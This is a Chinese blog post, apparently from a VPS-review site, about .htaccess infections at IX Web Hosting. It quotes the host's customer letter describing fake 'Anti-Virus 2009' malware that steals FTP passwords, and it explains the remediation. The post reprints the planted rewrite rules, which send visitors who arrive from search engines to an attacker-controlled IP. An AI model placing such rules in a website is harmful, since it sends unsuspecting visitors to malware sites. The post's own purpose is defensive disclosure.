关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- 韩国 CN2 $59.5 月 E5-2450L*2 32G 内存 1T 韩国VPS[主机]
- Chrome 下载文件提示恶意文件被拦截怎么办?全球[VPS测评]
- 疯狂猜成语 图猜成语三个人每个人拿着虎的一部分是什么成语?全球[VPS测评]
- 双十二 HostXen→充 300 元送 50 元 购买(续费)2 个日本VPS[主机]
- [11.11]HostKvm 促销套餐年付 6 折 全场 8 折 充$5全球[VPS测评]
- Laravel 安装过程报错 PHP extension mcrypt 全球[VPS测评]
- 国庆促销CombCloud→香港沙田 CN2 国庆特惠促销活动 全场年付香港VPS[主机]
- 看奈飞 VPS ¥29 月 512M 15G 硬盘 1T 流量 100M全球[VPS测评]
- 倒着写的黑字和白字是什么成语?全球[VPS测评]
- 补货通知 VirMach→512M 套餐圣何塞补货 速度不错 部分 IP全球[VPS测评]
- RAKsmart-日本 KVM 1G 内存 40G 硬盘 5M 无限流量日本VPS[主机]
- DMIT 美国 VPS→美国 CN2+美国高防+美国原生 IP 九折+1美国VPS[主机]
- 卫卫互联→60 元 月 1GB 内存 25GB 空间 1TB 流量 10虚拟空间(主机)
- 搬瓦工VPS传家宝10G KVM PROMO和SPECIAL 10G K全球[VPS测评]
- 如何阻止Windows Update捆绑更新设备驱动WINDOWS
- 如何检查便宜独立服务器上的硬盘是否已经损坏或者有坏道?独立服务器[U]
- 更新WordPress网站PHP7.2新版本的注意事项全球[VPS测评]
- 持续高温!长沙所有初中新生停止军训!全球[VPS测评]
- btcvps,比特云怎么样?香港VPS,KVM架构带宽4M月付88港币香港VPS[主机]
- CubeCloud,靠谱的香港cn2vps,美国cn2终身九折,原生IP美国VPS[主机]
- 亿恩科技香港云服务器 2核2G服务器特价700元/年香港VPS[主机]
- 弘速科技:香港安畅CN2+BGP线路1核2G/8M带宽秒杀款120元/年香港VPS[主机]
- ucloud云主机怎么样?ucloud云服务器1核2G仅52元/年起;香香港VPS[主机]
- 云服务器和服务器各有什么优缺点?全球[VPS测评]
- edgeNAT:2021元旦vps促销_全场韩国/美国/香港VPS低至7韩国VPS[主机]
- HostKVM香港云地VPS,2核4G内存折后$8.4/月,30M大带宽香港VPS[主机]
- 阿里云香港服务器多少钱一年?香港云服务器租用年付价格表香港VPS[主机]
- 群英云:新年促销活动,海外云服务器9.9元起,高防云服务器135元全球[VPS测评]
- 2020畅行云双11活动:海内外云服务器超低1.5折,2核2G5M云主机全球[VPS测评]
- pittqiao:彰化HiNet/台北CN2/东京NTT/上海茂名联通C全球[VPS测评]
转载请注明原文地址:http://140.238.13.167:12355/read-97554.html











